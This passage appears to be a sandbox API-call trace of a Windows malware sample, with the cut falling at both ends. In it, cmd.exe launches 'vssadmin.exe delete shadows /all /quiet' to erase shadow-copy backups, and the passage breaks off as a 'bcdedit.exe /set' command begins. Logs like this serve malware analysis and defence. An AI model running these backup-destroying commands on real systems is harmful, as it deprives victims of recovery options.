ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x4499a0 [0099.224] FindClose (in: hFindFile=0x4499a0 | out: hFindFile=0x4499a0) returned 1 [0099.224] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0099.224] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x2af1f0 | out: lpFindFileData=0x2af1f0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x5f5d9f50, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x5f5d9f50, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Desktop", cAlternateFileName="")) returned 0x4499a0 [0099.224] FindClose (in: hFindFile=0x4499a0 | out: hFindFile=0x4499a0) returned 1 [0099.224] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0099.224] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0099.224] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0099.224] GetProcessHeap () returned 0x430000 [0099.224] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x44cc40 | out: hHeap=0x430000) returned 1 [0099.224] GetEnvironmentStringsW () returned 0x44cc40* [0099.224] GetProcessHeap () returned 0x430000 [0099.224] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0xae8) returned 0x44d730 [0099.225] FreeEnvironmentStringsW (penv=0x44cc40) returned 1 [0099.225] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4acec0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0099.225] GetProcessHeap () returned 0x430000 [0099.225] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x448300 | out: hHeap=0x430000) returned 1 [0099.225] GetProcessHeap () returned 0x430000 [0099.225] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x4016) returned 0x44e220 [0099.225] GetProcessHeap () returned 0x430000 [0099.225] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x64) returned 0x448300 [0099.225] GetProcessHeap () returned 0x430000 [0099.225] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x44e220 | out: hHeap=0x430000) returned 1 [0099.225] GetConsoleOutputCP () returned 0x1b5 [0099.450] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4acebfe0 | out: lpCPInfo=0x4acebfe0) returned 1 [0099.450] GetUserDefaultLCID () returned 0x409 [0099.451] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4ace7b50, cchData=8 | out: lpLCData=":") returned 2 [0099.451] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2af5f0, cchData=128 | out: lpLCData="0") returned 2 [0099.451] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2af5f0, cchData=128 | out: lpLCData="0") returned 2 [0099.451] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2af5f0, cchData=128 | out: lpLCData="1") returned 2 [0099.451] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4acfa740, cchData=8 | out: lpLCData="/") returned 2 [0099.451] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4acfa4a0, cchData=32 | out: lpLCData="Mon") returned 4 [0099.451] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4acfa460, cchData=32 | out: lpLCData="Tue") returned 4 [0099.451] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4acfa420, cchData=32 | out: lpLCData="Wed") returned 4 [0099.451] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4acfa3e0, cchData=32 | out: lpLCData="Thu") returned 4 [0099.451] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4acfa3a0, cchData=32 | out: lpLCData="Fri") returned 4 [0099.451] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4acfa360, cchData=32 | out: lpLCData="Sat") returned 4 [0099.451] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4acfa700, cchData=32 | out: lpLCData="Sun") returned 4 [0099.451] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4ace7b40, cchData=8 | out: lpLCData=".") returned 2 [0099.451] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4acfa4e0, cchData=8 | out: lpLCData=",") returned 2 [0099.451] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0099.452] GetProcessHeap () returned 0x430000 [0099.452] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x20c) returned 0x44b5b0 [0099.452] GetConsoleTitleW (in: lpConsoleTitle=0x44b5b0, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\csrhdp.exe") returned 0x30 [0099.453] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e30000 [0099.453] GetProcAddress (hModule=0x76e30000, lpProcName="CopyFileExW") returned 0x76e423d0 [0099.453] GetProcAddress (hModule=0x76e30000, lpProcName="IsDebuggerPresent") returned 0x76e38290 [0099.453] GetProcAddress (hModule=0x76e30000, lpProcName="SetConsoleInputExeNameW") returned 0x76e417e0 [0099.453] GetProcessHeap () returned 0x430000 [0099.453] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x4012) returned 0x44e220 [0099.453] GetProcessHeap () returned 0x430000 [0099.453] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x44e220 | out: hHeap=0x430000) returned 1 [0099.454] _wcsicmp (_String1="vssadmin.exe", _String2=")") returned 77 [0099.454] _wcsicmp (_String1="FOR", _String2="vssadmin.exe") returned -16 [0099.454] _wcsicmp (_String1="FOR/?", _String2="vssadmin.exe") returned -16 [0099.454] _wcsicmp (_String1="IF", _String2="vssadmin.exe") returned -13 [0099.454] _wcsicmp (_String1="IF/?", _String2="vssadmin.exe") returned -13 [0099.454] _wcsicmp (_String1="REM", _String2="vssadmin.exe") returned -4 [0099.454] _wcsicmp (_String1="REM/?", _String2="vssadmin.exe") returned -4 [0099.454] GetProcessHeap () returned 0x430000 [0099.454] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0xb0) returned 0x44b7d0 [0099.454] GetProcessHeap () returned 0x430000 [0099.454] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x2a) returned 0x446570 [0099.455] GetProcessHeap () returned 0x430000 [0099.455] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x48) returned 0x448570 [0099.455] GetConsoleTitleW (in: lpConsoleTitle=0x2af500, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\csrhdp.exe") returned 0x30 [0099.456] GetFileAttributesW (lpFileName="vssadmin.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vssadmin.exe")) returned 0xffffffff [0099.456] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18 [0099.456] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17 [0099.456] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18 [0099.456] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2 [0099.456] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19 [0099.456] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19 [0099.456] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19 [0099.456] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4 [0099.456] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4 [0099.456] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17 [0099.456] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3 [0099.456] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6 [0099.456] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18 [0099.456] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2 [0099.456] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6 [0099.456] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9 [0099.456] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9 [0099.456] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4 [0099.456] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4 [0099.456] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6 [0099.456] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15 [0099.456] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3 [0099.457] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19 [0099.457] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19 [0099.457] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14 [0099.457] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14 [0099.457] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4 [0099.457] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17 [0099.457] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3 [0099.457] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17 [0099.457] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2 [0099.457] _wcsicmp (_String1="vssadmin", _String2="START") returned 3 [0099.457] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18 [0099.457] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11 [0099.457] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9 [0099.457] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6 [0099.457] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6 [0099.457] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21 [0099.457] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16 [0099.457] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20 [0099.457] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19 [0099.457] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9 [0099.457] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18 [0099.457] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17 [0099.457] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18 [0099.457] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2 [0099.457] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19 [0099.457] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19 [0099.457] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19 [0099.457] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4 [0099.457] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4 [0099.457] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17 [0099.457] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3 [0099.457] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6 [0099.457] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18 [0099.457] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2 [0099.457] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6 [0099.457] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9 [0099.457] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9 [0099.457] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4 [0099.457] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4 [0099.458] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6 [0099.458] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15 [0099.458] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3 [0099.458] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19 [0099.458] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19 [0099.458] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14 [0099.458] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14 [0099.458] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4 [0099.458] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17 [0099.458] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3 [0099.458] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17 [0099.458] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2 [0099.458] _wcsicmp (_String1="vssadmin", _String2="START") returned 3 [0099.458] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18 [0099.458] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11 [0099.458] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9 [0099.458] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6 [0099.458] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6 [0099.458] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21 [0099.458] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16 [0099.458] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20 [0099.458] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19 [0099.458] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9 [0099.458] _wcsicmp (_String1="vssadmin", _String2="FOR") returned 16 [0099.458] _wcsicmp (_String1="vssadmin", _String2="IF") returned 13 [0099.458] _wcsicmp (_String1="vssadmin", _String2="REM") returned 4 [0099.459] GetProcessHeap () returned 0x430000 [0099.459] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x218) returned 0x44b890 [0099.459] GetProcessHeap () returned 0x430000 [0099.459] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x62) returned 0x44bab0 [0099.459] _wcsnicmp (_String1="vssa", _String2="cmd ", _MaxCount=0x4) returned 19 [0099.459] GetProcessHeap () returned 0x430000 [0099.459] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x420) returned 0x44bb20 [0099.459] SetErrorMode (uMode=0x0) returned 0x0 [0099.459] SetErrorMode (uMode=0x1) returned 0x0 [0099.459] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x44bb30, lpFilePart=0x2aed90 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x2aed90*="Desktop") returned 0x25 [0099.459] SetErrorMode (uMode=0x0) returned 0x1 [0099.459] GetProcessHeap () returned 0x430000 [0099.459] RtlReAllocateHeap (Heap=0x430000, Flags=0x0, Ptr=0x44bb20, Size=0x76) returned 0x44bb20 [0099.459] GetProcessHeap () returned 0x430000 [0099.459] RtlSizeHeap (HeapHandle=0x430000, Flags=0x0, MemoryPointer=0x44bb20) returned 0x76 [0099.459] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4acdf360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0099.460] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0099.460] GetProcessHeap () returned 0x430000 [0099.460] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x128) returned 0x44bbb0 [0099.460] GetProcessHeap () returned 0x430000 [0099.460] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x240) returned 0x44bce0 [0099.465] GetProcessHeap () returned 0x430000 [0099.465] RtlReAllocateHeap (Heap=0x430000, Flags=0x0, Ptr=0x44bce0, Size=0x12a) returned 0x44bce0 [0099.465] GetProcessHeap () returned 0x430000 [0099.465] RtlSizeHeap (HeapHandle=0x430000, Flags=0x0, MemoryPointer=0x44bce0) returned 0x12a [0099.465] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4acdf360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0099.465] GetProcessHeap () returned 0x430000 [0099.465] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0xe8) returned 0x44be20 [0099.465] GetProcessHeap () returned 0x430000 [0099.465] RtlReAllocateHeap (Heap=0x430000, Flags=0x0, Ptr=0x44be20, Size=0x7e) returned 0x44be20 [0099.465] GetProcessHeap () returned 0x430000 [0099.465] RtlSizeHeap (HeapHandle=0x430000, Flags=0x0, MemoryPointer=0x44be20) returned 0x7e [0099.466] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0099.466] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vssadmin.exe", fInfoLevelId=0x1, lpFindFileData=0x2aeb00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aeb00) returned 0xffffffffffffffff [0099.466] GetLastError () returned 0x2 [0099.466] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vssadmin.exe.*", fInfoLevelId=0x1, lpFindFileData=0x2aeb00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aeb00) returned 0xffffffffffffffff [0099.466] GetLastError () returned 0x2 [0099.466] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vssadmin.exe", fInfoLevelId=0x1, lpFindFileData=0x2aeb00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aeb00) returned 0xffffffffffffffff [0099.466] GetLastError () returned 0x2 [0099.466] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0099.466] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.exe", fInfoLevelId=0x1, lpFindFileData=0x2aeb00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aeb00) returned 0x4499a0 [0099.466] GetProcessHeap () returned 0x430000 [0099.467] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x28) returned 0x4445f0 [0099.467] FindClose (in: hFindFile=0x4499a0 | out: hFindFile=0x4499a0) returned 1 [0099.467] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0099.467] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0099.467] GetConsoleTitleW (in: lpConsoleTitle=0x2af050, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\csrhdp.exe") returned 0x30 [0099.467] InitializeProcThreadAttributeList (in: lpAttributeList=0x2aee08, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2aedc8 | out: lpAttributeList=0x2aee08, lpSize=0x2aedc8) returned 1 [0099.467] UpdateProcThreadAttribute (in: lpAttributeList=0x2aee08, dwFlags=0x0, Attribute=0x60001, lpValue=0x2aedb8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2aee08, lpPreviousValue=0x0) returned 1 [0099.467] GetStartupInfoW (in: lpStartupInfo=0x2aef20 | out: lpStartupInfo=0x2aef20*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x0, hStdError=0x0)) [0099.467] GetProcessHeap () returned 0x430000 [0099.467] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x20) returned 0x444620 [0099.467] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0099.467] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0099.467] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0099.467] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0099.467] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0099.467] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0099.467] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0099.467] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0099.467] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0099.467] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0099.467] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0099.467] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0099.467] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0099.467] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0099.467] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0099.467] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0099.467] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0099.467] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0099.467] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0099.467] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0099.467] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0099.468] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0099.468] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0099.468] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0099.468] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0099.468] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0099.468] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0099.468] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0099.468] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0099.468] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0099.468] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0099.468] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0099.468] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0099.468] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0099.468] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0099.468] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0099.468] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0099.468] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0099.468] GetProcessHeap () returned 0x430000 [0099.468] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x444620 | out: hHeap=0x430000) returned 1 [0099.468] GetProcessHeap () returned 0x430000 [0099.468] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x12) returned 0x448370 [0099.468] lstrcmpW (lpString1="\\vssadmin.exe", lpString2="\\XCOPY.EXE") returned -1 [0099.469] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\vssadmin.exe", lpCommandLine="vssadmin.exe delete shadows /all /quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x2aee40*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="vssadmin.exe delete shadows /all /quiet", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2aedf0 | out: lpCommandLine="vssadmin.exe delete shadows /all /quiet", lpProcessInformation=0x2aedf0*(hProcess=0x54, hThread=0x50, dwProcessId=0x8b4, dwThreadId=0x570)) returned 1 [0099.476] CloseHandle (hObject=0x50) returned 1 [0099.476] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0099.476] GetProcessHeap () returned 0x430000 [0099.476] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x44d730 | out: hHeap=0x430000) returned 1 [0099.476] GetEnvironmentStringsW () returned 0x44cc40* [0099.476] GetProcessHeap () returned 0x430000 [0099.476] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0xae8) returned 0x44d730 [0099.476] FreeEnvironmentStringsW (penv=0x44cc40) returned 1 [0099.476] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) returned 0x0 [0159.255] GetExitCodeProcess (in: hProcess=0x54, lpExitCode=0x2aed38 | out: lpExitCode=0x2aed38*=0x0) returned 1 [0159.255] CloseHandle (hObject=0x54) returned 1 [0159.255] _vsnwprintf (in: _Buffer=0x2aefa8, _BufferCount=0x13, _Format="%08X", _ArgList=0x2aed48 | out: _Buffer="00000000") returned 8 [0159.255] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0159.256] GetProcessHeap () returned 0x430000 [0159.256] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x44d730 | out: hHeap=0x430000) returned 1 [0159.256] GetEnvironmentStringsW () returned 0x44cc40* [0159.256] GetProcessHeap () returned 0x430000 [0159.256] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0xb0e) returned 0x44ed40 [0159.256] FreeEnvironmentStringsW (penv=0x44cc40) returned 1 [0159.256] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0159.256] GetProcessHeap () returned 0x430000 [0159.256] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x44ed40 | out: hHeap=0x430000) returned 1 [0159.256] GetEnvironmentStringsW () returned 0x44cc40* [0159.256] GetProcessHeap () returned 0x430000 [0159.256] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0xb0e) returned 0x44ed40 [0159.256] FreeEnvironmentStringsW (penv=0x44cc40) returned 1 [0159.256] GetProcessHeap () returned 0x430000 [0159.256] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x448370 | out: hHeap=0x430000) returned 1 [0159.256] DeleteProcThreadAttributeList (in: lpAttributeList=0x2aee08 | out: lpAttributeList=0x2aee08) [0159.256] _get_osfhandle (_FileHandle=1) returned 0x7 [0159.256] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0159.257] _get_osfhandle (_FileHandle=1) returned 0x7 [0159.257] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4acde194 | out: lpMode=0x4acde194) returned 1 [0159.257] _get_osfhandle (_FileHandle=0) returned 0x3 [0159.257] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4acde198 | out: lpMode=0x4acde198) returned 1 [0159.257] SetConsoleInputExeNameW () returned 0x1 [0159.257] GetConsoleOutputCP () returned 0x1b5 [0159.257] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4acebfe0 | out: lpCPInfo=0x4acebfe0) returned 1 [0159.257] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0159.258] exit (_Code=0) Process: id = "7" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x6d1db000" os_pid = "0x6d0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x9b8" cmd_line = "/C bcdedit.exe /set 